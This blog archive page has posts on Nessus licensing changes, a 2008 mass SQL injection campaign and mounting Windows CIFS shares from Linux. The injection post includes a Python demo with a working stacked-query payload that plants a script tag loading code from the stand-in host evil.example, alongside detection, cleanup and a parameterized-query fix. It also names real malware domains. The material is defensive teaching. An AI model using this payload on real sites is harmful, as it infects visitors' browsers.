Archive for May, 2008

Nessus not free anymore :-(

Well, that’s not entirely true: they will still offer the “engine” for free, just not all of the plugins (maybe?). The current, but soon to be old, model had two types of subscriptions:

  1. Direct feed ($1,200 per year)
  2. Registered feed (free but plugins were 7 days old)

Come the end of July they will switch to a different model:

  1. Professional feed = Direct feed
  2. Home feed (only personal plugins, whatever that means?)

The press release was somewhat cryptic and I couldn’t decipher what exactly this “Home feed” will be. It could be all the plugins minus the compliance stuff, but the proof is in the pudding.

So it’s a sad day, but I guess we all knew this was coming. In fact I’m all for Tenable getting paid for their valuable service; I just hope they don’t go the next step and raise the price of the plugin feed to something outrageous. I think $1,200 is a reasonable price, especially if you’re an independent contractor like I used to be. Let’s just hope the “Professional feed” remains a reasonable price. Tenable could always introduce a 3rd tier geared towards large organizations to get even more capital, but maybe that won’t be necessary with their new model. If for some reason the 2-tier model doesn’t work I hope they will entertain the 3-tier model; I can only hope (fingers crossed). They could be shooting themselves in the foot with this move, which is essentially shooting their user base in the foot as well.

I’m not a hater, I like, no, love Nessus and think it’s, bottom line, the best vulnerability scanner on the market, period. I remember not too long ago (~4 years?) when Nessus had around 1,000 plugins; now there are over 21,000, so they have definitely grown over the years. I hope this move will help them to keep growing, just don’t forget the little guy.

Widespread SQL injection & Javascript malware

This is the first time I have ever seen SQL injection this widespread and in an automated fashion. Before it’s all said and done this could be !!! HUGE !!!. News of this has been trickling out since the end of April with the first hint of it at the beginning of the year.

Basically what’s happening is attackers are using SQL injection, in some sort of automated fashion, to insert JavaScript malware into the databases of some popular websites, the United Nations for example. The payload is a script tag written into text columns that the site later renders into its pages, so every page built from those rows now pulls a script from the attackers’ server. Once a user visits an infected website (un.org) their browser unknowingly fetches that script from the malicious site, which then tries numerous exploits to see if any succeed. Keep in mind the user will remain on un.org as if everything is fine and dandy, the address bar never changes, but in the background exploits are being launched.

What’s so scary about these widespread infections is that the JavaScript malware will remain in the database until the webmaster removes it. Even then the websites will still be vulnerable to SQL injection, so attackers can reinsert the malware until the vulnerability itself is fixed (parameterized queries and input validation, not just deleting the markup). Attackers can also easily update the location of their malicious site through the same SQL injection. For example, let’s say attackers are using http://evilattacker.com for launching their exploits but this URL gets blacklisted; they could then update infected databases with a new URL, say http://maliciousattacker.com, and blocklists based on the old name buy nothing. So this type of widespread epidemic is the gift that keeps on giving.

I’ve seen these attacks come across the IDS (intrusion detection system) where users are visiting infected URLs. Of course attackers could easily move their operations to different URLs. Some exploit URLs I’ve seen so far are nihaorr1.com, nmidahena.com, aspder.com, ririwow.cn, and wowyeye.cn. I performed searches to get an idea of the infection numbers; now, doing a search for the offending URL won’t give you a 1-to-1 relationship, but it will give you a ballpark figure. Take a look at the “Results” numbers in the following screenshots.

nihaorr1.com Infections

nmidahena.com Infections

aspder.com Infections

Also check out this screen shot from ririwow.cn, you’ll get a laugh from it.

ririwow.cn

So the ballpark infection count just from these three URLs is 500,000, scary isn’t it. Even if this number is 400,000 off, that still leaves 100,000 sites infected. There’s no way at this point to verify the number, but this is definitely the largest SQL injection campaign I have ever seen. It’s these URLs, along with others, that are hosting the JavaScript malware. It’s common to see the attackers use JavaScript to open zero-pixel iframes so the attack stays hidden. The JavaScript files I’ve seen so far have short names with either a single letter or number (e.g. m.js, 1.js, jp.js, etc.). So the request that happens in the background will look like http://ririwow.cn/jp.js. The injected script tag is visible in the infected page’s source if you know to look, but the iframe and exploit requests it triggers are not, so to see them you need a local web proxy or a packet capture. So I’m going to keep my eyes peeled in the coming months to see how this epidemic plays out.
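To make the mechanics concrete, here is an added example (an editor’s illustration, not code from the original post or from any of the sites it names). It assumes a hypothetical news site with an articles table and a title-search box, uses sqlite3’s executescript() to stand in for a database that runs stacked statements the way MS SQL Server does, and points the injected script at the placeholder host evil.example rather than any real domain. It walks through what the post describes: the concatenated query that lets an automated payload append a remote script tag to every stored row, the scrub a webmaster does and why it only lasts until the next pass, the parameterized query that actually closes the hole, and a check you can run against the database itself to find rows carrying a remote script tag.

```python
"""Added example, not code from the original post or from any site it mentions.

A miniature of the campaign described above, built on Python's bundled
sqlite3 module. Assumptions (the editor's, not the page's): a hypothetical
news site with an `articles` table and a title-search box; the vulnerable
search pastes user input into its SQL and, like MS SQL Server, runs stacked
statements (sqlite3's executescript() stands in for that); and the injected
script is hosted on the placeholder host evil.example.
"""
import re
import sqlite3

# Constructed sample content, as a CMS database might hold it before the attack.
SEED_ROWS = [
    ("Press briefing", "<p>Nothing to see here.</p>"),
    ("Annual report", "<p>Figures for the year.</p>"),
]

# Constructed attacker input. The leading %' closes the application's own
# LIKE pattern, the UPDATE appends a remote <script> to every article body,
# and the unterminated '% at the end is closed by the %' the application
# appends, so the whole thing parses cleanly with no comment tricks needed.
PAYLOAD = (
    "%'; UPDATE articles SET body = body || "
    "'<script src=\"http://evil.example/jp.js\"></script>' "
    "WHERE title LIKE '%"
)

# A remote script tag as the campaign stores it; group 1 is the host it loads from.
INJECTED_SCRIPT = re.compile(
    r'<script\s+src="https?://([^/"]+)/[^"]*\.js"\s*>\s*</script>',
    re.IGNORECASE,
)


def new_site_db():
    """Fresh in-memory database seeded with the constructed articles."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO articles (title, body) VALUES (?, ?)", SEED_ROWS)
    conn.commit()
    return conn


def search_vulnerable(conn, user_input):
    """The bug: user text is concatenated into the SQL and the whole string is
    run as a script, so any statements smuggled into the input run as well.
    Returns the titles the user would see, which look perfectly normal."""
    sql = "SELECT title FROM articles WHERE title LIKE '%" + user_input + "%'"
    conn.executescript(sql)  # runs the SELECT *and* anything stacked after it
    # executescript() discards result rows, so re-run only the first statement
    # to get what the results page would have rendered.
    first_statement = sql.split(";", 1)[0]
    return [row[0] for row in conn.execute(first_statement)]


def search_safe(conn, user_input):
    """The fix: the pattern travels as a bound parameter, so the engine treats
    every byte of it as data and can never parse it as an UPDATE."""
    rows = conn.execute(
        "SELECT title FROM articles WHERE title LIKE ?", ("%" + user_input + "%",)
    )
    return [row[0] for row in rows]


def find_injected(conn):
    """Defender's check: (article id, script host) for every stored body that
    carries a remote script tag. Run it against the database, not the rendered
    pages, because the database is where the campaign leaves its payload."""
    hits = []
    for article_id, body in conn.execute("SELECT id, body FROM articles"):
        for host in INJECTED_SCRIPT.findall(body):
            hits.append((article_id, host))
    return hits


def strip_injected(conn):
    """What a webmaster does on spotting the tags: scrub them from every row.
    Returns the number of rows cleaned. Does nothing about the hole itself."""
    cleaned = 0
    for article_id, body in conn.execute("SELECT id, body FROM articles").fetchall():
        scrubbed = INJECTED_SCRIPT.sub("", body)
        if scrubbed != body:
            conn.execute("UPDATE articles SET body = ? WHERE id = ?", (scrubbed, article_id))
            cleaned += 1
    conn.commit()
    return cleaned


def demo():
    """Infect, clean, re-infect, then fix. Returns the hits found at each stage."""
    conn = new_site_db()
    search_vulnerable(conn, PAYLOAD)       # visitor sees an ordinary results page
    after_attack = find_injected(conn)     # but every body now carries the tag
    strip_injected(conn)                   # webmaster scrubs the markup...
    after_cleanup = find_injected(conn)    # ...and the database looks clean
    search_vulnerable(conn, PAYLOAD)       # ...until the next automated pass
    after_reinfection = find_injected(conn)
    strip_injected(conn)
    search_safe(conn, PAYLOAD)             # with a bound parameter the payload is just text
    after_fix = find_injected(conn)
    return after_attack, after_cleanup, after_reinfection, after_fix


if __name__ == "__main__":
    for stage, hits in zip(("attack", "cleanup", "reinfection", "fix"), demo()):
        print(f"{stage:12s} {hits}")
```

The check in find_injected is deliberately loose (any remote .js in a script tag); on a real site you would whitelist the hosts your pages are supposed to load scripts from and alert on everything else, which also catches the attackers swapping in a new domain once the old one is blacklisted.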

Below are some other good articles related to this topic

Internet Storm Center

Websense

ShadowServer

CIFS, Linux, & Windows

I connect to Windows from Linux on almost a daily basis, so I wanted to let others know how I connect the two OSes. There are some articles out there that will explain how to access Windows shares from Linux, but they don’t explain things as simply as I would like. So first of all, there are two common ways to connect to a Windows share from Linux:

  1. mount -t cifs (or the older mount -t smbfs)
  2. smbclient

I prefer the “mount cifs” option because smbfs is no longer supported and smbclient gives you the awkward command-prompt look and feel, like ftp via the command line. An example of how you would connect to a share via “mount cifs” can be seen below (mounting needs root, hence the sudo).

prompt:~$ sudo mkdir -p /mnt/windows
prompt:~$ sudo mount -t cifs //machine/folder /mnt/windows -o username=travis

Keep in mind “machine” = the machine name (or IP address) and “folder” = the shared folder’s name as the server exports it. Also, I created the “windows” directory inside the “mnt” directory so that I would have a mount point. If the share requires authentication you will be prompted for a password; in a medium to large organization this will more than likely be your Active Directory username and password, and you may need to add domain=YOURDOMAIN to the -o options. Don’t be tempted to put password=… on the command line, since it ends up in your shell history and is visible to anyone running ps; for unattended mounts use credentials=/path/to/file instead, where the file holds username=, password= and optionally domain= lines and is chmod 600. Adding noexec,nosuid,nodev to the options is also cheap insurance when the share is writable by people you don’t fully trust. I’ve been using CIFS since 2007 and I’m never going back to smbfs or smbclient. I know CIFS has been around a while and I’m somewhat behind the times, but I didn’t have a real need for it until last year. CIFS was definitely one of my top finds of last year. If anyone knows of a better solution please hit me up.

================ FYI ================

  • Windows file sharing runs over SMB; CIFS is Microsoft’s name for its SMB1 dialect, which is why the two names get used interchangeably
  • You may see it referred to as CIFS/SMB
  • Samba is a free (GPL) implementation of SMB for Unix-like systems, both client and server
  • smbclient is a client program that comes with the Samba suite
  • CIFS is a dialect of SMB, not the newest one: Windows Vista and Server 2008 introduced SMB 2.0, while the Linux cifs module used above speaks SMB1/CIFS at the time of writing
  • In a Windows-centric organization CIFS/SMB often accounts for a large share of LAN traffic, which also makes it worth watching: it carries NTLM challenge/response authentication, SMB1 has no encryption, and signing is off by default on clients and member servers